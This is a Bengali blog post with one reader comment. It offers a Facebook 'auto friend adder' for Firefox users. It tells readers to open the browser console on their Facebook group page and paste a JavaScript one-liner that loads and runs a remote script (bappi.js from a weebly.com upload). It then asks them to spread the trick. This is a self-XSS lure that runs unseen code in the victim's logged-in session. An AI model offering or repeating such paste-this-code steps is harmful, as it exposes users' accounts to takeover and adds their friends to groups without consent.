আপনার ফেসবুক গ্রুপে যত খুশি তত বন্ধু যোগ করুন নিমষেই

আপনি যদি ফায়ার ফক্স ব্যবহার করে থাকেন তাহলে আমাদের একটু সাহায্য করুন। আপনি চাইলেই পারেন যে কোন গ্রুপের মেম্বার সহজেই বাড়াতে। আপনার নিজস্ব কোন গ্রুপ থাকতেই পারে, হয়তো অনেক কষ্ট অরেও আপনি খুব বেশি হলে ২০০০-৩০০০ মেম্বার একত্রিত করতে পেরেছেন। কিন্তু এখন আর সেই কষ্ট করতে হবে নাহ। আমি নিয়ে এলাম আপনাদের জন্য Auto Bot Friend Adder, ইহা শুধু মাত্রই ফায়ারফক্স ব্যবহারকারীদের জন্য, যেহেতু আমি নিজে মজিলা ফায়ারফক্স ব্যবহার করি। আপনার সব বন্ধুকে যে কোন ফেসবুক গ্রুপে এ্যাড করতে নিম্নোক্ত পদক্ষেপ গ্রহণ করুনঃ-
১> >প্রথমেই আপনি যে গ্রুপে আপনার সব বন্ধুকে একত্রে যুক্ত করতে চান মজিলা ফায়ারফক্স ব্যবহার করে সেই গ্রুপে যান !
২>> এবার কীবোর্ডে Ctrl + Shift + K চাপুন । দেখবেন একটা ড্রপ ডাউন মেনু আসবে, এখানে জাভা স্ক্রিপ্ট লিখে আপনি অনেক কিছুই করতে পারেন। তবে আজ আপনাদের কে আমি কিভাবে আপনার সব ফ্রেন্ড একটি গ্রুপে ঢুকাবেন তা দেখাবো ।
৩> >এইবার নিম্নোক্ত জাভা স্ক্রিপ্টটি Copy করুন। Select and (Ctrl+C) –>>>
javascript:  (function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.weebly.com/uploads/4/4/7/4/4474196/bappi.js‘;})();
Untitled
 
৪> >ড্রপ ডাউন মেনুতে যেখানে জাভা স্ক্রিপ্ট লেখার জন্য একটা কারসার ব্লিঙ্ক করছে সেখানে সম্পূর্ণ কোডটি পেস্ট করে দিন, এবার Enter চাপুন , আপনার সব বন্ধু আপনার গ্রুপে এ্যাড না হয়ে যাওয়া পর্যন্ত অপেক্ষা করুন। এভাবে আপনার ঘনিষ্ট সব বন্ধুদের বলুন, তারাও আপনাকে আপনার গ্রুপে বন্ধু যোগ করতে সাহায্য করবে। আপনি যদি উপকৃত হন তবে আমাদের গ্রুপে আপনার মূল্যবান বন্ধুদের কে যোগ করুন একই উপায়ে এবং আমাদের সাথে যুক্ত থাকুন বন্ধুত্ব, আড্ডা আর গানে, ধন্যবাদ সবাইকে ।- জর্জ অল্ড্রিন ঘোষ (CFO)
 https://www.facebook.com/groups/ET.ENT/ –  আমার ফেসবুক গ্রুপ, জয়েন করেন সবাই আর আপনাদের বন্ধুদের কে যোগ করেন।  আপনারা আমার গ্রুপটাকে একটু সচল করতে আপনাদের বন্ধুদের যুক্ত করুন, এইটা ছোট ভাই হিসাবে আপনাদের সবার নিকট আমার একটা বিশেষ আবদার !!

Please visit my facebook : https://www.facebook.com/mp.mahadi

4 thoughts on “আপনার ফেসবুক গ্রুপে যত খুশি তত বন্ধু যোগ করুন নিমষেই

  1. টিয়া কালার কোড টা ঠিক মত দিয়ে দেখেন । হয়ে যাবে ।

Leave a Reply

Your email address will not be published. Required fields are marked *